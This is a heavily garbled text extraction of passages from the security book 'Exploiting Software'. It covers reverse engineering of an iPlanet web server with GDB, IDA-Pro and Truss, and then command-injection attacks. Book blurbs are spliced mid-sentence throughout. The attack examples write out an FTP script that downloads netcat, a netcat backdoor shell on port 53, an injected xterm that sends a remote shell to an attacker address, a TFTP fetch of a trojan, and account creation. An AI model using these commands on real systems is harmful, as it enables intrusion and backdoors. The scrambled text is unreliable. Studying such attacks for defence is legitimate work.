sof t wld arlook e ex ploit w illiple condtirinue t oies bef or a ser r oblem pr ogrWhy am shou in m ult ect or a gious iven pfile. Check t hese dir ect or ies t o det er m ine w het h er y ou can sneak a Tr ojan file int o t he t arg et . When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

Input Path Tracing I npu t t r acing is a v er y com p let e b ut t ed ious t echniqu e for t rack ing w hat is happ en in g wit h u ser inv olves set t ing br eakp oin t s at t he locat ions w h er e user dat a ar e accept ed in a pr ogr am , an d t he for w ar d. To save som e t im e y ou can use call t r acing t ools, con t r ol flow t ools, and m em or y br eak •t echniqu es are Table of Content s m ore det ail in Ch apt er 3. For t h e follow ing ex er cise w e use p at h- t r a d escr ib ed in I ndex t• r ace inpu t int o a v uln er able f ile sy st em call. Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Using GDB and IDA-Pro Together on a Solaris SPARC Binary Pub lish er: Addison Wesley Pub gh Dat e: 17,a 200 4 dow s- based t ool, t he pr of essional v ersion can b e used t o decomp ile bi Alt hou I DFebruary A- Pro is W in 0- 20war 1- 786 v ariet yI SBN: of h ard e 95 p -8 lat for m s. I n t h is ex am ple, w e use I DA- Pr o t o decom pile one of t h e m ain ex t he Net scape Pages: 51 2I - Planet Ap plicat ion Ser ver r un ning on t he Solar is 8/ Ult r a- SPARC 10.

GDB is qu it e possib ly t he m ost p ow er fu l debu gger av ailable. The ad van ced feat ur es such as con br eakp oint s an d ex pr essions p ut GDB in t h e sam e class w it h Sof t I ce. GDB, of cour se, w ill also di code, so t echnically I DA is n ot r equir ed. How ever , I DA is t he best choice f or t ackling a larg e disa pr oj ect . How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.

Setting Breakpoints and Expressions

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu est sused by cial bad wguy br eak w ar e.. IAf ybrou w poin ant ttoallow p rot ect ar p e rog fr om Br eak poin ar e cru h ens rt oever sin gsof a tt ar get eak s usy tour o stsof op t twhe ram in a at t ack , op y ou m uw stefircan st lear n hine owmr eal at t acks carr ied On ce st ped, ex am em ory an d are can really t h en single st ou ep t t. hr ough f unct ion calls. Wit h an disassem bly open in one w indow , it 's p ossible t o sin gle st ep in anot h er win dow an d t ake not es. m ust - h ave ayy shock y ou—and t ainly e ygou. Get t ingbly bey ond gt he IThis DA so hand y is book t he abmilit t o t ak e not es w hitilewill p ercer f orm ing educat a ru nnin d isassem . Usin a disass scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t t he result ing dead list in g ) and a r un ning debug ger at t he sam e t im e is a v ar iet y of gr ay box t est Ther e ar e t w o b asic w ay s t o get st ar t ed wit h b reak point s: in sid e- ou t or ou t sid e- in . Going insideWhy sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem fin ding an int erest ing syst em call or API f un ct ion , such as a f ile op er at ion, t hen set t ing a br eak p fu nct ion andnet beginn g t o itwyormkech back war d do t o det When w or k in secur anisms n oterwm orine k w h et h er any user - su pplied d at a ar e b ein call. This is a pow er f ul w ay t o r ev er se a pr ogr am , bu t shou ld b e aut om at ed as m uch as possib le out sideolvt er esns fin ding t he p r ecise fun ct ion w her e user dat a ar e fir st int rod uced int o t he pr og At t in ackinv pat begin single st epping an d m ap ping t he ex ecut ion of t h e code for w ar d int o t he pr ogr am . Th is is v det er min h er e codeRev in er gsewengineer in gbr anch in g log ic is based on user - su pplied d at a. Bot h m et hods can be co m axim um ef fect . Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Mapping Runtime Memory Addresses from IDA Tech niqu es f or cr aft ing m aliciou s inpu t Unfor t u nat ely, mem or y addr esses t h at ar e display ed in I DA d o not m ap dir ect ly t o t he r un t ime e t echn icalHow detev ails uf easy fer ovter s m in e t he off set s an d d o t h e m apping by hand . For w hile The using GD B. er,ofitbis o fdlow et er I DA d isp lay s t h e fu nct ion INTutil_uri_is_evil_internal at add ress 0x00056140, t h e follow in Root k it can be issu eds t o map t h e t r ue r un t im e add ress. I DA d isplay s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

.text:00056140 ! ||||||||||||||| S U B R O U T I N E |||||||||||||||||||||||||||

.text:00056140 .text:00056140 .text:00056140



Table of Content s



I ndex

.global INTutil_uri_is_evil_internal

Set t ing a b reak point w it h GDB w ill r eveal t he t r ue r un t im e page f or t h is su br out ine: Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

(gdb) break *INTutil_uri_is_evil_internal Breakpoint 1 at 0xff1d6140 How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex i t intghis S owftewcan a resee is loaded w it h ex ampm les at t ack s, at t Not ack epat t er tns, ools, So,p flo rom t h at 0x00056140 apof s troeal 0xff1d6140. t hat he tof fset an w itdhin t he m tisechniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om 0x6140 in bot h ad dr esses. A r ough m app in g sim ply inv olv es su bst it ut ing t h e upp er 2 b yt es in t at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he book s, you w ill learn abou t

Attaching Running scr ipt k id die t rto eata m en t f ound in Process m any hack ing

A n ice f eat ur e of GDB is t he abilit y t o at t ach and det ach fr om a cu r rent ly r u nning pr ocess. Becau Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem ser v er sof t w ar e has a comp lex st ar t up cy cle it is oft en v er y d if ficult or inconv en ien t t o st art t he s w it hin a d eb ugg er . Th e abilit y t o at t ach t o an alr eady r un ning pr ocess is a gr eat t im e- saver . Firs When net w or k secur it y m ech anisms do n ot w or k fin d t he PI D of t he pr ocess t o debu g. I n t he case of Net scap e I - Plan et , locat in g t he corr ect p roce t r ies and som e tt rial At t ack pat er nsan d er r or . To at tRev achert osea engineer r un ning in prgocess w it h GD B, st art gdb an d t hen t yp e t he f ollowin g com m and at t he w her epr ocess- id is t he PI D of you r t ar get : Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s (gdb) attach process-id Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

On ce y ou hav e at t ached t o t he pr ocess, t y pe t he continue com m and so t h e ex ecu t able w ill cont You can u se ct r l- c t o get b ack t o t h e gdb p rom pt .

(gdb) continue •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

I f t he p rocess is m ult it hr eaded, y ou can see a list of all t h e t hr eads b y issuin g t h e info com m an By Gr eg Hoglund y McGr aw bey ond simp ly list ing t h reads, of cour se. ) com man d h as, Gar m any u ses Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

(gdb) info threads How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir90 ew Thread alls, int ru71 sion det ect ion sy st em s, and iv ir us soft war e n ot from k eep in/usr/lib/libc.so.1 g out t he bad g uy s? 0xfeb1a018 in ant _lwp_sema_wait () What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. 89 Thread 70 (LWP 14) 0xfeb18224 in _poll () from /usr/lib/libc.so.1 Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used s t o br eak sof ar e. I f y ou w antfrom t o p rot ect y our sof t w ar e fr om 88 Thread 69 by bad guy 0xfeb88014 int wcond_wait () /usr/lib/libthread.so.1 at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . 87 Thread 68 0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1 This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr k id die t67 r eat m en t f ound in m any hack book s, you ill learn abou t 86iptThread 0xfeb88014 in ing cond_wait () wfrom /usr/lib/libthread.so.1 85 Thread 66 0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1 Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem 84 Thread 65w or k secur it0xfeb88014 indocond_wait When net y m ech anisms n ot w or k () from /usr/lib/libthread.so.1 83 Thread 64t er ns At t ack pat

0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1

82 Thread Rev er se 63 engineer in g 0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1 Classic at serv er soft win ar econd_wait () from /usr/lib/libthread.so.1 81 Thread 62t acks ag ainst 0xfeb88014 Sur pr ising ainst clien t soft e 80 Thread 61 at t acks ag 0xfeb88014 inwar cond_wait () from /usr/lib/libthread.so.1 Tech niqu60 es f or cr aft ing m aliciou s inpu 79 Thread 0xfeb88014 in tcond_wait () from /usr/lib/libthread.so.1 The t echn ical det ails of b uf fer ov er f low s 78 Thread 59 0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1 Root k it s 77 Thread 58

0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1

Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak 76wThread 57 0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1 soft ar e. 75 Thread 56

0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1

74 Thread 55

0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1

73 Thread 54

0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1

72 Thread 53

0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1

...

To g et a list of all t he f unct ions on t he call st ack , issue t h e follow ing: •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

(gdb) I SBN: info0- 20 stack 1- 786 95 -8 Pages: 51 2

#0 0xfedd9490 in _MD_getfileinfo64 () from /usr/local/iplanet/servers/bin/https/lib/libnspr4.so #1 0xfedd5830 in PR_GetFileInfo64 () How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls,/usr/local/iplanet/servers/bin/https/lib/libnspr4.so int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? from What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. #2 0xfeb62f24 in NSFC_PR_GetFileInfo () Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . #3 0xfeb64588 in NSFC_ActivateEntry () This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so #4 0xfeb63fa0 NSFC_AccessFilename Why sof t w arin e ex ploit w ill con t inue t o be() a ser ious p r oblem from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er nsNSFC_GetFileInfo () #5 0xfeb62d24 in Rev/usr/local/iplanet/servers/bin/https/lib/libnsfc.so er se engineer in g from Classic at t acks ag ainst serv er soft w ar e () #6 0xff1e6cdc in INTrequest_info_path Sur pr ising at t acks ag ainst clien t soft war e from /usr/local/iplanet/servers/bin/https/lib/libns-httpd40.so ...

Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s

IEx np t his t he cur en t fs,unct ion, w hich called by yt oPR_GetFIleIn lo i texam in g Spole, ft w_MD_getfileinfo64 a re is f illed wit h t h e is t ools, conr cept and kn ow ledgweas necessar b reak w aswcalled soft ar e. by NSFC_PR_GetFileInfo, an d so for t h. The call st ack can help you b ack t r ack a f unct det er min e w hich code p at h is being follow ed .

Using Truss to Model the Target on Solaris To r ev er se engineer t he I - Plan et binar ies, w e cop ied t he main execut ab le and all t he link ed lib ra st andar d Wind ow s 200 0 w or k st at ion w h er e I DA- Pr o w as in st alled. The goal w as t o ex amin e t he

calls and t he URL f ilt er ing cod e t o uncov er p ossible w ay s int o t he file syst em r em ot ely . This ex am used as a m odel f or f in ding v ulner abilit ies in m any soft w ar e p ack ages. Rev er se engineer in g t arg on m any UNI X plat for m s using I DA, and GD B is av ailab le for alm ost ev ery p lat for m ou t t h er e. When r ev ersing a Web serv er , t he f irst t ask is t o locat e an y r out ines t hat ar e han dling unif orm r ident if ier ( URI ) dat a. Th e URI dat a ar e supplied by r emot e user s. I f t her e is any w eak ness, t h is t he easiest t o ex ploit . Am ong t h e hug e num b er of API calls t h at ar e m ade ev ery second, it ' s har d dow n w hat is imp or t ant . For t un at ely t here ar e som e pow er ful t ools t hat can help y ou mod el a r u • Table of Content s app licat ion. For t his exam ple, t h e URI han dling r out ines w ere t rack ed d own u sing t h e excellent S • I ndex called Tr uss. [ 2] Expl oit ing Softw a re How to Br e ak Code

Mor e infor Tr uss can be found at http: / / solar is.java.sun.com/ ar ticles/ multipr oc/ tr uss_com p.h By Gr eg[ 2]Hoglund , Garmy ation McGrabout aw

Under Solar is 8, Tr uss w ill t r ack t he lib rar y API calls of a ru nning p rocess. Th is is useful t o d et er Pub lish er: Addison Wesley calls are bein g m ad e w hen cer t ain b eh avior is occur r ing. To fig ur e out w here dat a wer e being ha Pub Dat e: February 17, 200 4 I - Planet serv er , w e r an Tr u ss ag ainst t h e m ain p rocess and dum p ed logs of t h e calls t hat wer e m I SBN: -8 dled . ( I f you ar e not r unn ing und er Solar is, y ou can use a sim ilar t ool su Web requ est0-s20w1-er786 e 95 han 51 2 open- sour ce t ool and it w or ks on m an y plat for m s. ) lt r ace Pages: is a f ree, Tr uss is v er y easy t o u se and has t h e nice feat u re t hat it can b e at t ached and det ached f r om a r u pr ocess. To at t ach Tr u ss t o a pr ocess, get t h e PI D of t h e t ar get an d issue t h e follow ing comm an d How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . # truss *::book -vall process_id This m ust -u - h ave m ay-xall shock -p y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem I f you ar e int er est ed only in cer t ain API calls, y ou can u se Tru ss wit h grep: When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e # truss -vall -xall -p 2307 | grep anon Tech-u niqu*:: es f or cr aft ing m aliciou s inpu2>&1 t The t echn ical det ails of b uf fer ov er f low s Root k it s This ex am ple w ill " t r uss" t he pr ocess w it h PI D 23 07 and w ill only show calls w it h t he sub st rin g a Ex p lo i t inchan g So ft w is f illed e t ools, con cept s, and kn Th owis ledg e necessar y se t o by reak You can ge t haere grep slighwit t lyht ot hign ore only cer t ain calls. is usef ul becau ou m ay w a soft e. except t hose ann oying poll an d read calls: everwytarhing

# truss -u *:: -vall -xall -p 2307 2>&1 | grep –v read | grep –v poll

( Not e t h at t h e 2>&1 t ag is r equ ir ed becau se Tru ss does not deliv er all it s d at a on t he st d out pipe •The ou t pu t of Table Content s w ill look som et h ing lik e t h is: t h eofcom m and • I ndex Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

/67:

libns-httpd40:__0FT_util_strftime_convPciTCc(0xff2ed342, 0x2, 0x2,

/67: u stlibns-httpd40:INTpool_strdup(0x9e03a0, 0xff2ed330, 0x0, 0x0) at t ack , y ou m fir st lear n h ow r eal at t acks are really carr ied ou t. /67: -> book libc:strlen(0xff2ed330, 0x0, This m ust - h ave m ay shock y ou—and it will cer0x0, t ainly 0x0) educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t /67: $tmpfile"); Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak print "$scr"; soft w ar SCRFILE e. close(SCRFILE);

Com plet e com pr om ise of a sy st em usually includ es in st alling a backd oor such as su b7 or back o fir st st ep is t o r un a t est comm and t o check access perm ission s. Laun ch in g a fu ll- out assault w it

w het her t h e comm and s act ually allow f iles t o be cr eat ed is un wise. The st at u s of t he log f iles m ust also be consider ed . Can t hey be w rit t en t o? Can t hey be er ased? w ho do n ot t hink t h is t hr ough car ef ully ar e bou nd for t rou ble. To t est f or log w rit ab ilit y , issue a c t his:



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley

touch temp.dat Pub Dat e: February

17, 200 4

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Then issue a dir ect or y list ing:

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ls This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem The f ile should be t h er e. Now t ry t o delet e it : When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e rm temp.dat Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Can it be erased? Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Nowwcheck soft ar e. t he log f iles. I f t he sy st em is a Wind ows NT ser v er, t he log files ar e likely t o b e fou nd WI NNT\ syst em 32\ LogFiles dir ect ory . Tr y t o append som e dat a t o on e of t hese files ( t he filen am e

echo AAA >> ex2020.log type ex2020.log



Table of Content s

Ch eck t h at t h e new dat a ar e t her e. Now t r y t o delet e t he f ile. I f t he file can b e w iped, w e'r e in lu • I ndex at t ack er can safely exp loit t he sy st em and clean up aft er w ar d. I f ( and on ly if ) t hese t est s p ass, a Expl oit ing Softw a re How to Br e ak Code be p laced on t he sy st em , t h en st ep 2 , cr eat in g a scr ipt file f or t he b ack door , is possible. By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley * Attack Example: Injection and FTP Pub Dat e: February 17, 200 4 0- ple 20 1- 786 A g oodI SBN: ex am scr 95 ipt-8is an FTP scr ipt for Window s. The FTP client almost alway s ex ist s, an d can 2 scr ipt s can cause t he FTP client t o conn ect t o a host an d d ow nload a f ile. On ce t aut omPages: at ed. 51 FTP dow n load ed , it can t hen be ex ecut ed :

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om echo at t ack anonymous>>ftp.txt , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . echo This mroot@>>ftp.txt ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t echo prompt>>ftp.txt t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem echo Why get sof nc.exe>>ftp.txt When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns This wRev ill cr an FTP in scr ereat se e engineer g ipt t o d own load n et cat t o t he t ar get m achine. To execut e t h e scr ipt , w follow ing com man d: Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s ftp –s:ftp.txt Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

On ce n et cat is on t he m achine, w e t h en op en a backd oor using t he f ollowin g com m and:

nc –L –p 53 –e cmd.exe



Table of Content s

•This op en s aI ndex list ening por t over w hat looks lik e a DNS zon e t r ansfer connect ion ( por t 5 3) . Th is is Expld. oitex ing a re How ing, to Brw e ak Codea back door . cm e.Softw By connect e get By Gr eg Hoglund , Gar y McGr aw

Using on ly com m and inj ect ion, w e hav e est ab lished a b ack door on t he syst em . Figur e 4- 8 illust r at t ack er con nect in g t o t he por t t o t est t he sh ell. Th e at t acker is p resent ed w it h a st an dar d DOS Pub lish er: Addison Wesley Success. Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

Figu r e 4 - 8 . The u lt i m at e goal : a com m an d sh el l on a r e m ot e t a r g

full tsize How d oes sof t w are br eak ? How do at t acker s m[ View ake sof w arim e age] br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g

* Attack Example: Injection Remote Classic at t acks ag ainst servand er soft w ar e xterms Suraprb ising at t acks ainst t soft war e is a h eav y w eigh t t ask . This act iv it y alm ost alw a Mov ing ack door pr ograg am t o aclien r emot e sy st em files and an aud it t r ail on t he t arg et m ach ine ( som et hing t hat r eq uir es cleanup ) . Som et im es a re Techt oniqu es f orusing cr aft pr ingogr mam aliciou s inpu t y ex ist on t he sy st em. Many UNI X syst em s hav e X is easier ex ploit s t hat alr ead inst alled , and get t ing a r em ot e shell f rom X is m uch easier t han inst alling a b ack door fr om scrat t echn ails ofX bser uf fer f lowotse shell can be spaw n ed t o t he at t ack er' s deskt op. x t er mThe pr ogr am ical anddet a local v er ov , aerr em Rootak itv sulnerab le PHP ap plicat ion scr ipt t hat passes user dat a t o t h e sh ell via t he f ollow ing c Con sider Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

passthru( "find . –print | xargs cat | grep $test" );

I f an at t ack er supp lies t h e follow ing inpu t st r ing



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

;/usr/X/bin/xterm –ut –display 192.168.0.1:0.0 Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

w her e t he I P addr ess 192.168.0.1 can be an y add ress ( and shou ld lead t o t h e at t acker 's X ser v x t er m is cr eat ed. The at t ack er issu es t he inp ut st r ing and w ait s. Secon ds g o by . Su ddenly , an x t er m w ind ow f lick s How d oes sofblank t w arewbr do atwtitacker sof e brhash eak on p urptpose? Whyeare 4- 9 , t h e at scr een, f ir st hiteak e, ?t hHow en f illed h t exst .mI ake s t h er e taw ar root pr om ? I n Figur issu t h eint idrucom and det ine nderant w hat user t hek eep at t ack in g.g uy s? fir ewed alls, sionmdet ectt oion syerstmem s, uand iv ir us softcont warext e n ot in g is outoperat t he bad What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu badcce guyssf s t oul br eak sofltt wsarof e. an I f y ou t o ptrot Figuesr eused 4 - 9by. Su r e su a tw t eant m pt o ect spiynouransofxt w t earremfr om r e m ot e at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . a t t a ck e r h as be com e u se r SysM an . Th is a t t a ck i s ea sil y st op ped w it h

in st al la t i on of t he X W in dow s sy st em .

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t full size im age] Why sof t w ar e ex ploit w ill con t inue t o be a[ View ser ious p r oblem

When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

* Attack Example: Injection and Tiny FTP (TFTP)

TFTP is a ver y simp le pr ot ocol for mov ing f iles. To car r y out t his at t ack t h e at t ack er m u st hav e a r unn ing som ew her e t hat is accessible t o t h e t ar get m achine. The t arg et w ill m ake a connect ion t st or age depot . A b ack door pr ogr am is a n ice t hing t o hav e w ait in g t here for d ep loy m ent . Th e co look som et h in g lik e t h is ( on W in dow s, using dou ble escapes) :



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

"C:\\WINNT\\system32\\tftp –i GET trojan.exe" Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

I n t his exam p le, t r oj an. ex e could be an y file y ou w ish t o pull f r om t he depot . TFTP is a useful w a files. I t is on e of t he f ew w ays t o up load n ew fir m w are " im ag es" in t o r out er s, swit ches, and cabl Adept use of TFTP is a necessit y. Recent ly , w or m s and ot her k inds of malicious code h ave b eg un in mu lt ist ag e at t ack s. How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s.

* Attack Example: Adding a User with Injection

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d As sim pleesasused all t by h ese b ack areak e, asof b ack door t hewsyst ayect n ot ev en a necessit t echniqu bad guydoor s t osbr t w ar e. I fon y ou ant em t o pm rot y our sofbe t w ar e fr om y. By add in g a new accoun t , an at t acker m ay end up w it h plent y of access. A f am ous ex amp le ( at leas at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . on a T- shir t wor n ar ound t h e hack er con vent ion Def- Con) of an at t ack er add in g an account w as Thist he m ust - hict ave m ay hacker shock yKev ou—and will t ainly e y"ou. Get t ing( r bey t he b ack w by conv edbook crim inal in Mit nitick w hcer o add ed educat t h e " t oor account oot ond spelled scrsu iptspkect id die m en t f ound in mcom anyman hackd ing book abou un ingt rt eat ar get host s. Using in ject ions,u you nderwaillprlearn ivileged p tr ocess, an at t ack er can a m achine fair ly easily. sofWindow t w ar e exsploit w ill t inue t oan beaccou a ser nt ious p r be oblem Again,Why using NT as ancon ex am ple, can added as follow s: When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at 